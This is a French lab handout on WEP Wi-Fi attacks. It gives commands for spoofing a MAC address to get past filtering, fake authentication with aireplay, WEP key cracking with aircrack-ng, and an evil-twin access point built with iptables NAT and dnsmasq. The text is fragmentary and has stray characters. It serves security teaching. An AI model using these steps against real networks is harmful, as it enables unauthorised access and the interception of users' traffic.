TP4-Attaques WEP
TP4-Attaques WEP
TP4-Attaques WEP
Si le AP intègre un filtrage d’adresses MAC, changez votre adresse MAC et remplacez la par celle
d'une station qui s'est connectée a l'AP. Pour cela il faut :
- Désactiver l’interface sans fil
- Modifier votre adresse MAC avec celle de la victime :
ifconfig eth0 hw ether xx :xx :xx :xx :xx :xx
- Configurer l’adresse IP en mode DHCP ou selon la plage d’adressage du réseau à
l’aide de l’outil de sniffing Wireshark.
Aireplay
1. Fake authentication
On va en premier lieu tester l'association avec le point d'accès avec une attaque "-1" dite de fake
authentication. Elle permet de tester si le point d'accès possède un filtrage d'adresses mac.
Aircrack
aircrack-ng -x fichier_capture
où fichier_capture est le nom du fichier de capture de airodump ( *.cap ou *.ivs).
On peut essayer de démarrer aircrack en supposant qu’il s’agit d’une clé 64. Pour cela dans les
paramètre de aircrack-ng, il suffit de rajouter -n 64, et aircrack va tenter de cracker la clef wep
comme si c'était une clef 64 même s' il s'avère que c'est une 128.
Aircrack nous affiche tous les réseaux qu'il a rencontrés, leur cryptage et le nombre de IVs
correspondant. Il vous suffit d'entrer le numéro du réseau.
Combien de paquets sont nécessaires pour cracker une clé WEP 64 bits ? et 128 bits ?
# cd Desktop r
# mkdir eviltwin
# cd eviltwin/
# nano dnsmasq.conf
- Repérer le AP victime
#airodump-ng wlan0mon
- Noter le nouveau réseau sans fil dans un client WiFi (vos smartphones par exemple)
- Configurer l’interface at0
# ifconfig at0 up
# ifconfig at0 10.0.0.1 netmask 255.255.255.0
# route add -net 10.0.0.0 netmask 255.255.255.0 gw 10.0.0.1
# iptables -P FORWARD ACCEPT
# iptables -t nat -A POSTROUTING -o wlan0mon -j MASQUERADE
# echo 1 > /proc/sys/net/ipv4/ip forward
# ifconfig
- Exécuter dnsmasq
# dnsmasq –C Desktop/eviltwin/dnsmasq.conf –d
Laisser cette console ouverte.
jjj